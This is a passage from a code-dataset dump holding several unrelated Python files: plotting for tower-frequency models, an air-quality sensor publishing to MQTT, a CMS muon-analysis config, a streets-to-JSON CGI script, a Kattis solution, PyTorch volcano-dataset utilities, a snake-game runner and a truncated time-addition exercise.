~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ PLOT FIGURE FOR EMPIRICAL LAW ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\tfig = plt.figure(1, figsize = (10, 10))\n\tspec = gridspec.GridSpec(figure = fig, ncols=3, nrows=3, top = 0.95, bottom = 0.06, left = 0.1, right = 0.97, wspace = 0.1, hspace = 0.3)\n\n\t# ~ prepare axis\n\tax11 = fig.add_subplot(spec[0, 0])\n\tax12 = fig.add_subplot(spec[0, 1])\n\tax13 = fig.add_subplot(spec[0, 2])\n\tax21 = fig.add_subplot(spec[1, 0])\n\tax22 = fig.add_subplot(spec[1, 1], sharex = ax12)\n\tax23 = fig.add_subplot(spec[1, 2], sharex = ax13)\n\tax31 = fig.add_subplot(spec[2, 0], sharex = ax21)\n\n\t# ~~ default color \n\tmfc = 'dimgray'\n\tmec = 'k'\n\n\t# ~~ model 1 --> model 6\n\tprediction1 = Reg1.model_1_emp(Reg1.input, *(Reg1.pars))\n\tax11.plot(Reg1.database['H'], Reg1.database['f0'], linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax11.plot(Reg1.database['H'], prediction1, 'r+', ms = 6., label = 'model 1 -> 6')\n\n\t# ~~ model 7\n
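\t# Overlay fitted vs measured f0 (Table 2 model 7 is implemented by model_2_emp)\n\tprediction2 = Reg2.model_2_emp(Reg2.input, 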
*(Reg2.pars))\n\tax12.plot(Reg2.database['H'], Reg2.database['f0'], linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax12.plot(Reg2.database['H'], prediction2, 'r+', label = 'model 7')\n\n\t# ~~ model 8\n\tprediction3 = Reg3.model_3_emp(Reg3.input, *(Reg3.pars))\n\tax13.plot(Reg3.database['H'], Reg3.database['f0'], linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax13.plot(Reg3.database['H'], prediction3, 'r+', label = 'model 8')\n\n\t# ~~ model 9 & 10\n\tprediction4 = Reg4.model_4_emp(Reg4.input, *(Reg4.pars))\n\tax21.plot(Reg4.database['H'], Reg4.database['f0'], linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax21.plot(Reg4.database['H'], prediction4, 'r+', label = 'model 9 & 10')\n\n\t# ~~ model 11\n\tprediction5 = Reg5.model_5_emp(Reg5.input, *(Reg5.pars))\n\tax22.plot(Reg5.database['H'], Reg5.database['f0'], linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax22.plot(Reg5.database['H'], prediction5, 'r+', label = 'model 11')\n\n\t# ~~ model 12\n\tprediction6 = Reg6.model_6_emp(Reg6.input, *(Reg6.pars))\n\tax23.plot(Reg6.database['H'], Reg6.database['f0'], linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax23.plot(Reg6.database['H'], prediction6, 'r+', label = 'model 12')\n\n\t# ~~ model 13\n\tprediction7 = Reg7.model_7_emp(Reg7.input, *(Reg7.pars))\n\tax31.plot(Reg7.database['H'], Reg7.database['f0'], linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec, label = 'Measured ' +r'$f_0$')\n\tax31.plot(Reg7.database['H'], prediction7, 'r+', label = 'Computed ' +r'$f_0$')\n\n\t# ~~ Physics based model\n\tdata = database[(database['H'] != -1) & (database['Heff'] != -1) & (database['breadth'] != -1) & (database['length'] != -1) & (database['max_wall_thickness'] != -1) & (database['f0'] != -1) & (database['density'] != -1) & (database['E'] != -1)]\n\n\tli_H = data['H'][0:-1]\n\tli_f0 = data['f0'][0:-1]\n\tli_mod_pb1 = []\n\tli_mod_pb2 = []\n\tli_mod_pb3 = []\n\tli_mod_pb4 = []\n\tth = 90\n\tfor ii in data.index[0:-1]:\n\t\tprint(\"~~~~~~~~~~~~ Tower # %s ~~~~~~~~~~~\" % str(ii))\n\t\ttower = Formulation(database.iloc[ii]) # Build Empirical formulation object\n\t\tf0_model_pb1 = tower.f0_phy('model_1', theta = th)\n\t\tf0_model_pb2 = tower.f0_phy('model_2', theta = th)\n\t\tf0_model_pb3 = tower.f0_phy('model_3', theta = th)\n\t\tf0_model_pb4 = tower.f0_phy('model_4', theta = th)\n\n\t\t# save data\n\t\tli_mod_pb1.append(f0_model_pb1)\n\t\tli_mod_pb2.append(f0_model_pb2)\n\t\tli_mod_pb3.append(f0_model_pb3)\n\t\tli_mod_pb4.append(f0_model_pb4)\n\n\t# ~~ Compute R2 for the physics based models\n\tSST = np.sum((li_f0 - np.mean(li_f0))**2)\n\tSSR_pb1 = np.sum((li_f0 - li_mod_pb1)**2)\n\tSSR_pb2 = np.sum((li_f0 - li_mod_pb2)**2)\n\tSSR_pb3 = np.sum((li_f0 - li_mod_pb3)**2)\n\tSSR_pb4 = np.sum((li_f0 - li_mod_pb4)**2)\n\n\tR2_pb1 = 1 - np.divide(SSR_pb1, SST)\n\tR2_pb2 = 1 - np.divide(SSR_pb2, SST)\n\tR2_pb3 = 1 - np.divide(SSR_pb3, SST)\n\tR2_pb4 = 1 - np.divide(SSR_pb4, SST)\n\n\n\n\t# ~~ axis process ~~\n\tli_R2 = [Reg1.R2, Reg2.R2, Reg3.R2, Reg4.R2, Reg5.R2, Reg6.R2, Reg7.R2, R2_pb1, R2_pb2, R2_pb3, R2_pb4]\n\tli_title = ['Emp. model 1', 'Emp. model 2', 'Emp. model 3', 'Emp. model 4', 'Emp. model 5', 'Emp. model 6', 'Emp. 
model 7']\n\tfor aa, ax in enumerate([ax11, ax12, ax13, ax21, ax22, ax23, ax31]):\n\t\tax_settings_plot(ax)\n\t\tax.text(90, 6, r'$R^2 = %s$'%np.round(li_R2[aa], 2))\n\t\tax.text(60, 12, li_title[aa], bbox=dict(facecolor='none', edgecolor='black', boxstyle='round'), fontsize = 12)\n\n\n\tfor ax in [ax11, ax21, ax31]:\n\t\tax.set_ylabel(r'$f_0\\,[Hz]$')\n\n\tfor ax in [ax22, ax23, ax31]:\n\t\tax.set_xlabel('H [m]')\n\n\n\t# ~~ LEGEND\n\tax31.legend(bbox_to_anchor=(2,0.75), frameon=False)\n\n\t# ~~ PLOT AND SAVE\n\tplt.savefig('Empirical_Relation.png', dpi = 500)\n\n\t#plt.show()\n\n\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\t# ~~ PLOT FIGURE FOR PHYSICS BASED LAW ~~\n\t# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\tfig = plt.figure(2, figsize = (10, 5))\n\tspec = gridspec.GridSpec(figure = fig, ncols=3, nrows=2, top = 0.9, bottom = 0.12, left = 0.1, right = 0.97, wspace = 0.1, hspace = 0.3)\n\n\tax32 = fig.add_subplot(spec[0, 0], sharex = ax22,sharey = ax31)\n\tax33 = fig.add_subplot(spec[0, 1], sharex = ax22,sharey = ax31)\n\tax41 = fig.add_subplot(spec[0, 2], sharex = ax22,sharey = ax31)\n\tax42 = fig.add_subplot(spec[1, 0], sharex = ax22,sharey = ax31)\n\n\n\n\t# ~~ Physics based model 1\n\tax32.plot(li_H, li_f0, linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax32.plot(li_H, li_mod_pb1, 'r+')\n\n\t# ~~ Physics based model 2\n\tax33.plot(li_H, li_f0, linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax33.plot(li_H, li_mod_pb2, 'r+')\n\n\t# ~~ Physics based model 3\n\tax41.plot(li_H, li_f0, linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec)\n\tax41.plot(li_H, li_mod_pb3, 'r+')\n\n\t# ~~ Physics based model 4\n\tax42.plot(li_H, li_f0, linewidth = 0, marker = 'o' , markersize = 6,markerfacecolor = mfc, markeredgecolor = mec, label = 'Measured ' +r'$f_0$')\n\tax42.plot(li_H, li_mod_pb4, 'r+', label = 'Computed ' +r'$f_0$')\n\t# ~~ axis process ~~\n\tli_R2 = [R2_pb1, R2_pb2, R2_pb3, R2_pb4]\n\tli_title = ['Phys. based model 1', 'Phys. based model 2', 'Phys. based model 3', 'Phys. 
based model 4']\n\tfor aa, ax in enumerate([ax32, ax33, ax41, ax42]):\n\t\tax_settings_plot(ax)\n\t\tax.text(90, 6, r'$R^2 = %s$'%np.round(li_R2[aa], 2))\n\t\tax.text(30, 12, li_title[aa], bbox=dict(facecolor='none', edgecolor='black', boxstyle='round'), fontsize = 12)\n\n\n\tfor ax in [ax32, ax42]:\n\t\tax.set_ylabel(r'$f_0\\,[Hz]$')\n\n\tfor ax in [ax42, ax33, ax41]:\n\t\tax.set_xlabel('H [m]')\n\n\n\t# ~~ LEGEND\n\tax42.legend(bbox_to_anchor=(2,0.75), frameon=False)\n\n\t# ~~ PLOT AND SAVE\n\tplt.savefig('Physics_Based.png', dpi = 500)\n\n\tplt.show()\n\n\n","repo_name":"MArnaud/TURRIS","sub_path":"EmpiricalPhysicsBasedModel.py","file_name":"EmpiricalPhysicsBasedModel.py","file_ext":"py","file_size_in_byte":30470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"34744313971","text":"import serial,datetime,time\nimport paho.mqtt.client as mqtt\nfrom time import gmtime,strftime\n\nport = serial.Serial('/dev/ttyS0', baudrate=9600, timeout=1)\n\ndef read_pm_line():\n    # Sync on the 0x42 0x4D frame header one byte at a time so a stream\n    # that starts mid-frame can realign, then return the 30-byte payload.\n    while True:\n        if port.read(1) != b'\\x42':\n            continue\n        if port.read(1) != b'\\x4D':\n            continue\n        return port.read(30)\n### custom action ###\ndef on_connect(client, userdata, flags, rc):\n    print(\"Connected code: {}\".format(rc))\n    client.subscribe(topic = \"test\")\ndef on_disconnect(client, userdata, rc):\n    print(\"Disconnected From Broker\")\n### action appointed ###\nprint(\"creating new instance\")\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_disconnect = on_disconnect\n\nprint(\"connecting to broker\")\nclient.connect(\"140.123.107.170\",1883,60)\ntime.sleep(0.5)\nclient.loop_start()\n\nwhile True:\n    try:\n        rcv = read_pm_line()\n        res = {'timestamp':datetime.datetime.now()}\n        res['apm10']=(rcv[2] * 256 + rcv[3])\n        res['apm25']=(rcv[4] * 256 + rcv[5])\n        res['apm100']=(rcv[6] * 256 + rcv[7])\n        res['pm10']=(rcv[8] * 256 + rcv[9])\n        res['pm25']=(rcv[10] * 256 + rcv[11])\n        res['pm100']=(rcv[12] * 256 + rcv[13])\n        res['gt03um']=(rcv[14] * 256 + rcv[15])\n        res['gt05um']=(rcv[16] * 256 + rcv[17])\n        res['gt10um']=(rcv[18] * 256 + rcv[19])\n        res['gt25um']=(rcv[20] * 256 + rcv[21])\n        res['gt50um']=(rcv[22] * 256 + rcv[23])\n        res['gt100um']=(rcv[24] * 256 + rcv[25])\n        print(\"===============\")\n        print(\"PM1\\t: {}\".format(res['pm10']))\n        print(\"PM2.5\\t: {}\".format(res['pm25']))\n        print(\"PM10\\t: {}\".format(res['pm100']))\n        print(\">0.3um\\t: {}\".format(res['gt03um']))\n        print(\">0.5um\\t: {}\".format(res['gt05um']))\n        print(\">1.0um\\t: {}\".format(res['gt10um']))\n        print(\">2.5um\\t: {}\".format(res['gt25um']))\n        print(\">5.0um\\t: {}\".format(res['gt50um']))\n        print(\">10um\\t: {}\".format(res['gt100um']))\n        datt = strftime(\"%Y%m%d\")\n        timm = strftime(\"%H%M%S\")\n        timee = datt + timm\n        print(timee)\n        msg = \"'EE' {} {} {} {} {} {} {} {} {} {}\".format(res['pm10'],res['pm25'],res['pm100'],res['gt03um'],res['gt05um'],res['gt10um'],res['gt25um'],res['gt50um'],res['gt100um'],timee)\n        client.publish(\"sen/aqi\",msg)\n        time.sleep(5)\n\n    except KeyboardInterrupt:\n        client.loop_stop()\n        
break\n\n","repo_name":"abnormal749/final-project","sub_path":"mq_aqi.py","file_name":"mq_aqi.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34402576284","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"MuonPlots\")\n\n# Messages\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 100\n\nprocess.load(\"Configuration.StandardSequences.Geometry_cff\")\nprocess.load(\"Configuration.StandardSequences.MagneticField_38T_cff\")\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nprocess.load(\"Configuration.StandardSequences.Reconstruction_cff\")\nprocess.GlobalTag.globaltag = 'GR_R_38X_V14::All'\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n ## Produced with MuonAnalysis/Examples/test/patSkims/patMuons_mc_cfg.py\n 'file:/data/gpetrucc/7TeV/mu11/DATA_2010B/tupleData_56_1_IBk.root',\n 'file:/data/gpetrucc/7TeV/mu11/DATA_2010B/tupleData_57_1_uaT.root',\n 'file:/data/gpetrucc/7TeV/mu11/DATA_2010B/tupleData_58_1_Lqw.root',\n 'file:/data/gpetrucc/7TeV/mu11/DATA_2010B/tupleData_59_1_s0U.root',\n 'file:/data/gpetrucc/7TeV/mu11/DATA_2010B/tupleData_5_1_xpk.root',\n ),\n lumisToProcess = cms.untracked.VLuminosityBlockRange(),\n)\n\n\nfrom FWCore.PythonUtilities.LumiList import LumiList\nprocess.source.lumisToProcess = LumiList(filename = 'Cert_136033-149442_7TeV_Nov4ReReco_Collisions10_JSON.txt').getCMSSWString().split(',')\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(20000) )\nprocess.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )\n\nprocess.TFileService = cms.Service('TFileService', fileName=cms.string('inclusiveMuonPlots_Data.root') )\n\ndef addAliases(process, mainlabel):\n mainmodule = getattr(process,mainlabel)\n ## split also in barrel/endcap\n abseta = \"abs(eta)\"\n if mainlabel.find(\"standAlone\") == 0: abseta = \"abs(outerTrack.eta)\";\n mbar = mainmodule.clone(selection = mainmodule.selection.value() + \" && \"+abseta+\" < 1.2\");\n mec = mainmodule.clone(selection = mainmodule.selection.value() + \" && \"+abseta+\" > 1.2\");\n setattr(process, mainlabel+\"B\", mbar);\n setattr(process, mainlabel+\"E\", mec );\n setattr(process, mainlabel+\"_Paths\", cms.Path(mainmodule+mbar+mec))\n\nfrom MuonAnalysis.Examples.inclusiveMuonPlots_cfi import makeInclusiveMuonPlots;\ncommonInputs = cms.PSet(\n muons = cms.InputTag('patMuonsWithTrigger'),\n onlyLeadingMuon = cms.bool(True),\n old36Xdata = cms.bool(False),\n primaryVertices = cms.InputTag(\"offlinePrimaryVertices\"),\n doTrackExtrapolations = cms.bool(False),\n extraPlots = cms.bool(True),\n jets = cms.InputTag(\"ak5PFJets\"),\n met = cms.InputTag(\"pfMet\"),\n)\n\nCSEL=\"pt > 20 && (!triggerObjectMatchesByPath('HLT_Mu9').empty() || !triggerObjectMatchesByPath('HLT_Mu15_v1').empty()) && \"\nprocess.trackerMuons = cms.EDAnalyzer(\"InclusiveMuonPlots\",\n makeInclusiveMuonPlots(ptScale=3),\n commonInputs,\n selection = cms.string(CSEL+\"isTrackerMuon\") # && muonID('TMLastStationAngTight')\"),\n)\naddAliases(process, \"trackerMuons\")\n\nprocess.globalMuons = process.trackerMuons.clone(selection = CSEL+\"isGlobalMuon\")\naddAliases(process, \"globalMuons\")\n\nif False:\n process.standAloneMuons = process.trackerMuons.clone(selection = CSEL+\"isStandAloneMuon\")\n process.standAloneMuonsVH = process.trackerMuons.clone(selection = 
CSEL+\"isStandAloneMuon && outerTrack.numberOfValidHits > 0\")\n addAliases(process, \"standAloneMuons\")\n addAliases(process, \"standAloneMuonsVH\")\n\n\nprocess.tightMuons = process.globalMuons.clone(\n selection = (CSEL+\n 'muonID(\"GlobalMuonPromptTight\") && numberOfMatches > 1 && '+\n 'track.hitPattern.numberOfValidPixelHits > 0 && track.hitPattern.numberOfValidTrackerHits > 10 && '+\n 'abs(dB) < 0.2')\n)\naddAliases(process, \"tightMuons\")\n\nprocess.tightIsoMuons = process.globalMuons.clone(\n selection = (CSEL+\n 'muonID(\"GlobalMuonPromptTight\") && numberOfMatches > 1 && '+\n 'track.hitPattern.numberOfValidPixelHits > 0 && track.hitPattern.numberOfValidTrackerHits > 10 && '+\n 'abs(dB) < 0.2 &&'+\n '(isolationR03.emEt + isolationR03.hadEt + isolationR03.sumPt)/pt < 0.1' )\n)\naddAliases(process, \"tightIsoMuons\")\n\nprocess.tightBMuons = process.globalMuons.clone(\n selection = (CSEL+\n 'muonID(\"GlobalMuonPromptTight\") && numberOfMatches > 1 && '+\n 'track.hitPattern.numberOfValidPixelHits > 0 && track.hitPattern.numberOfValidTrackerHits > 10 && '+\n 'abs(dB) < 0.5 && abs(dB/edB) > 3.5' )\n)\naddAliases(process, \"tightBMuons\")\n\n\n\n","repo_name":"ahlinist/cmssw","sub_path":"MuonAnalysis/Examples/test/inclusiveMuonPlots/inclusiveMuonPlots_Data_highPt_cfg.py","file_name":"inclusiveMuonPlots_Data_highPt_cfg.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"22948680030","text":"#! c:\\python3\\python.exe \n# coding: utf-8\n\"\"\"\nk_show_streets @is_json=:is_json1\n\"\"\"\n\nimport json\nimport my_sql_func\nimport socket\nimport logging.config\nimport logging_yaml\n\nlogging_yaml.setup_logging()\n# logging.config.fileConfig('logging.ini', disable_existing_loggers=False)\nlogger = logging.getLogger(__name__)\n\nconnect_file = 'config.ini'\nsection = 'my_connect' if socket.gethostname().lower() == 'adm' else 'mfc_connect' # my_connect mfc_connect\n# section = 'mfc_connect'\ntry:\n conn = my_sql_func.create_connection(connect_file, section)\nexcept Exception as ex:\n logger.exception(\"exception message\", ex)\n raise\n\ncursor = conn.cursor()\ntry:\n cursor.execute(\"exec k_show_streets \")\nexcept Exception as ex:\n logger.exception(\"exception message\", ex)\n raise\nrows = cursor.fetchall()\ncols = [i[0] for i in cursor.description]\n\ndata = {\"dataStreets\": []}\nfor item in rows:\n data[\"dataStreets\"].append(dict(zip(cols, item)))\n\nlogger.info(\"streets have been unloaded. 
rowcount: \" + str(len(rows)))\ncursor.close()\nconn.close()\n# =====================================================\nprint(\"Content-type: application/json; charset=utf-8 \\n\")\nprint(json.dumps(data, ensure_ascii=False))\n# print(json.dumps(data, indent=4, ensure_ascii=False))\n# =====================================================\n","repo_name":"mpuzanov/Bill18Py","sub_path":"show_streets.py","file_name":"show_streets.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"23840875104","text":"import sys\nfrom functools import lru_cache\nsys.setrecursionlimit(2000000)\n\ndef read_input():\n return sys.stdin.readline().replace('\\n','')\n\ndef input_to_int_tuple(separator=' '):\n return tuple(map(int, read_input().split(separator)))\n\nboard_x, board_y = input_to_int_tuple()\n\nboard = []\nfor x in range(board_x):\n board.append(list(map(int, list(read_input()))))\n\n\n# Deleting identical rows\nskip = False\ndeleted = []\nfor row in range(board_x-1):\n if skip:\n skip = False\n continue\n\n if board[row] == board[row+1]:\n board.pop(row+1)\n deleted.append(row+1)\n skip = True\n\nboard_x = board_x - len(deleted)\n\nnumber_of_moves = int(read_input())\nmoves = []\nfor n in range(number_of_moves):\n x1, y1, x2, y2 = input_to_int_tuple()\n \n # Changing x's if rows were deleted\n for row_index in deleted:\n if x1 >= row_index:\n x1 -= 1\n if x2 >= row_index:\n x2 -= - 1\n\n moves.append(((x1-1, y1-1), (x2-1, y2-1)))\n\n\ndef get_type_of_person(x, y):\n if board[x][y]:\n return 'decimal', 1\n return 'binary', 0\n\ndef get_board_value(x, y):\n if x < 0 or y < 0 or x >= board_x or y >= board_y:\n return\n return board[x][y]\n\nzones = {\n 0: [],\n 1: [],\n}\n\ndef build_zones():\n visited = set()\n\n for row in range(board_x):\n for column in range(board_y):\n if (row, column) in visited:\n continue\n else:\n zone = set()\n\n @lru_cache(maxsize=None)\n def walk(x, y, group_type):\n if (x, y) in visited or get_board_value(x, y) != group_type:\n return\n visited.add((x, y))\n\n zone.add((x, y))\n\n directions = [\n (x, y-1),\n (x, y+1),\n (x-1, y),\n (x+1, y),\n ]\n\n for direction in directions:\n walk(direction[0], direction[1], group_type)\n\n walk(row, column, get_board_value(row, column))\n\n zones[get_board_value(row, column)].append(zone)\n\nbuild_zones()\n\ndef check_move(move):\n x1, y1 = move[0] # Start\n x2, y2 = move[1] # Finish\n\n person, repr_person = get_type_of_person(x1, y1)\n\n for zone in zones[repr_person]:\n if (x1, y1) in zone and (x2, y2) in zone:\n return person\n return 'neither'\n\nfor move in moves:\n print(check_move(move))\n","repo_name":"pawelpel/open-kattis","sub_path":"problems playground/10KindsOfPeople_2_s.py","file_name":"10KindsOfPeople_2_s.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"6922830097","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 29 21:03:40 2018\n\n@author: stephanecaron\n\"\"\"\n\n###############################################################################\n# Apprentissage et reconnaissance\n# GIF-4101 / GIF-7005, Automne 2018\n# Devoir 4, Code utilitaire\n#\n###############################################################################\n\nimport gzip\nimport random\n\nimport numpy as np\n\nfrom sklearn.metrics import confusion_matrix\n\nimport torch\nimport torch.nn as 
nn\n\n\nCODES_DE_SECTION = {\n    'BACC': 4101,\n    'GRAD': 7005\n}\n\n\nclass VolcanoesDataset:\n    \"\"\"\n    This class defines the Volcanoes dataset for PyTorch\n    dataset from Francisco Mena on kaggle: https://bit.ly/2DasPF1\n\n    Args:\n        path (str): path to the dataset's .pt file\n    \"\"\"\n\n    def __init__(self, path):\n        # keep the parameters\n        self.path = path\n\n        # load the data\n        with gzip.open(path, 'rb') as f:\n            self.data = torch.load(f)\n        self.targets = np.array(list(zip(*self.data))[1])\n\n    def __getitem__(self, index):\n        return self.data[index]\n\n\nclass VolcanoesLoader:\n    \"\"\"\n    This class loads the Volcanoes dataset for PyTorch\n    during training while balancing the dataset\n\n    Args:\n        dataset (VolcanoesDataset): the dataset to use\n        batch_size (int): the batch size to use\n    \"\"\"\n\n    def __init__(self, dataset, batch_size, balanced=True, random_seed=42):\n        # Keep the parameters\n        self.dataset = dataset\n        self.batch_size = batch_size\n        self.balanced = balanced\n\n        # Compute the indices and sizes of the positive and negative\n        # examples, so the dataset can be rebalanced\n        self.pos_idx = np.where(self.dataset.targets == 1)[0].tolist()\n        self.neg_idx = np.where(self.dataset.targets == 0)[0].tolist()\n        self.pos_size = len(self.pos_idx)\n        self.neg_size = len(self.neg_idx)\n\n        # Set the random seed\n        self.random = random.Random(random_seed)\n\n    def __next__(self):\n        # Check whether the epoch is over\n        if self.i_batch == self.nb_batch:\n            raise StopIteration\n\n        # Compute the indices of the batch\n        start = self.i_batch * self.batch_size\n        end = start + self.batch_size\n        idx = self.indices[start:end]\n\n        # Select the batch\n        X, y = [], []\n        for i in idx:\n            X.append(self.dataset.data[i][0])\n            y.append(self.dataset.data[i][1])\n\n        # Convert the lists to torch tensors\n        X = torch.stack(X)\n        y = torch.stack(y).float().view(-1, 1)\n\n        # Increment the counter\n        self.i_batch += 1\n\n        return X, y\n\n    def __iter__(self):\n        # Choose the sampling strategy\n        if self.balanced:\n            # Sample as many negative examples as there are positives\n            neg_sample = self.random.sample(self.neg_idx, k=self.pos_size)\n\n            # Build the index set for this epoch\n            self.indices = self.pos_idx + neg_sample\n            self.random.shuffle(self.indices)\n        else:\n            self.indices = list(range(len(self.dataset.data)))\n            self.random.shuffle(self.indices)\n\n        # Compute the number of batches and reset the counter\n        self.nb_batch = len(self.indices) // self.batch_size\n        self.i_batch = 0\n\n        return self\n\n\nclass VolcanoesConv(nn.Module):\n    \"\"\"\n    This class defines the convolution\n    used within the VolcanoesNet network\n    \"\"\"\n\n    def __init__(self, ch_in, ch_out, kernel):\n        super().__init__()\n        padding = kernel // 2\n        self.model = nn.Conv2d(ch_in, ch_out, \\\n            kernel, stride=2, padding=padding)\n\n    def forward(self, x):\n        return self.model(x)\n\n\ndef compute_accuracy(model, dataloader, device='cpu'):\n    training_before = model.training\n    model.eval()\n\n    all_predictions = []\n    all_targets = []\n    for i_batch, batch in enumerate(dataloader):\n        images, targets = batch\n\n        images = images.to(device)\n        targets = targets.to(device)\n\n        with torch.no_grad():\n            predictions = model(images)\n\n        all_predictions.append(predictions.cpu().numpy())\n        all_targets.append(targets.cpu().numpy())\n\n    if all_predictions[0].shape[-1] > 1:\n        predictions_numpy = np.concatenate(all_predictions, axis=0)\n        predictions_numpy = predictions_numpy.argmax(axis=1)\n        
targets_numpy = np.concatenate(all_targets, axis=0)\n else:\n predictions_numpy = np.ravel(all_predictions)\n targets_numpy = np.ravel(all_targets)\n predictions_numpy[predictions_numpy >= 0.5] = 1.0\n predictions_numpy[predictions_numpy < 0.5] = 0.0\n\n if training_before:\n model.train()\n\n return (predictions_numpy == targets_numpy).mean()\n\n\ndef compute_confusion_matrix(model, dataloader, device='cpu'):\n training_before = model.training\n model.eval()\n\n all_predictions = []\n all_targets = []\n dataloader.balanced = False\n for i_batch, batch in enumerate(dataloader):\n images, targets = batch\n\n images = images.to(device)\n targets = targets.to(device)\n\n with torch.no_grad():\n predictions = model(images)\n\n all_predictions.append(predictions.cpu().numpy())\n all_targets.append(targets.cpu().numpy())\n dataloader.balanced = True\n\n predictions_numpy = np.ravel(all_predictions)\n targets_numpy = np.ravel(all_targets)\n\n predictions_numpy[predictions_numpy >= 0.5] = 1.0\n predictions_numpy[predictions_numpy < 0.5] = 0.0\n\n if training_before:\n model.train()\n\n matrix = confusion_matrix(targets_numpy, predictions_numpy)\n matrix = matrix / matrix.sum(axis=1)[:, np.newaxis]\n\n return matrix","repo_name":"stecaron/gif-7005-devoirs","sub_path":"devoir-4/d4utils.py","file_name":"d4utils.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"24923398268","text":"import random\nimport sys\nfrom argparse import ArgumentParser\nfrom math import isinf\nfrom time import sleep\n\nimport numpy as np\nimport pandas as pd\n\nfrom snakes.bots import bots\nfrom snakes.elo import print_tournament_summary\nfrom snakes.game import Game, RoundType, deserialize, print_event\nfrom snakes.utils import levenshtein_ratio, Printer\n\n\ndef main(snake1, snake2, rate, seed, start):\n names = [Bot(id=i, grid_size=(1, 1)).name for i, Bot in enumerate(bots)]\n\n name_matches = [levenshtein_ratio(name, snake1) for name in names]\n agent1 = np.argmax(name_matches)\n\n name_matches = [levenshtein_ratio(name, snake2) for name in names]\n agent2 = np.argmax(name_matches)\n\n # One agent could be up against itself, so we'll need to give new ids\n agents = {0: bots[agent1], 1: bots[agent2]}\n\n if seed is None:\n seed = random.randrange(sys.maxsize)\n random.seed(seed)\n\n game = Game(agents=agents, round_type=RoundType.TURNS)\n\n if start:\n grid_size, candies, turn, snakes = deserialize(start)\n game.state.grid_size = grid_size\n game.state.candies = candies\n game.state.turn = turn\n game.state.snakes = snakes\n\n printer = Printer()\n printer.print(game)\n while True:\n for event in game.update():\n agent_names = {id: agent.name for id, agent in game.agents.items()}\n print_event(event, agent_names)\n printer.print(game)\n if not isinf(rate):\n sleep(1 / rate)\n\n if game.finished():\n break\n\n print(f'For a replay of this game run the following command:\\n./commandline.py {snake1!r} {snake2!r} --seed {seed}')\n print()\n row = {game.agents[id].name: rank for id, rank in game.rank().items()}\n row['turns'] = game.turns\n row['seed'] = seed\n row.update({'cpu_' + game.agents[i].name: cpu for i, cpu in game.cpu.items()})\n df = pd.DataFrame([row])\n print_tournament_summary(df, elo=False)\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(description='Battle two snakes in the command line')\n parser.add_argument('snake1', help=\"Name of snake 1\")\n parser.add_argument('snake2', help=\"Name of snake 
2\")\n parser.add_argument('-r', '--rate', default=float('inf'), type=float, help=\"Playback rate (Hz)\")\n parser.add_argument('-s', '--seed', type=int, help='Random seed')\n parser.add_argument('--start', help='Start from game state')\n args = parser.parse_args()\n\n try:\n main(**vars(args))\n except KeyboardInterrupt:\n pass\n","repo_name":"nobleans-playground/coding-challenge-snakes","sub_path":"commandline.py","file_name":"commandline.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"17593460392","text":"def add_time(start, duration, *day):\n # print(start, duration)\n new_time = ''\n\n # Start arg breakdown\n start_time = start.split()\n start_hhmm = start_time[0].split(':')\n start_hh = int(start_hhmm[0])\n start_mm = int(start_hhmm[1])\n meridian = [start_time[1]]\n if meridian[0] == 'AM':\n meridian.append('PM')\n elif meridian[0] == 'PM':\n meridian.append('AM')\n\n # Duration arg breakdown\n add_hhmm = duration.split(':')\n add_hh = int(add_hhmm[0])\n add_mm = int(add_hhmm[1])\n\n # Optional day arg\n week_day = ''\n if day:\n week_day = day[0].title()\n\n # Calculations\n start_minutes = (start_hh * 60) + start_mm\n add_minutes = (add_hh * 60) + add_mm\n days_count = 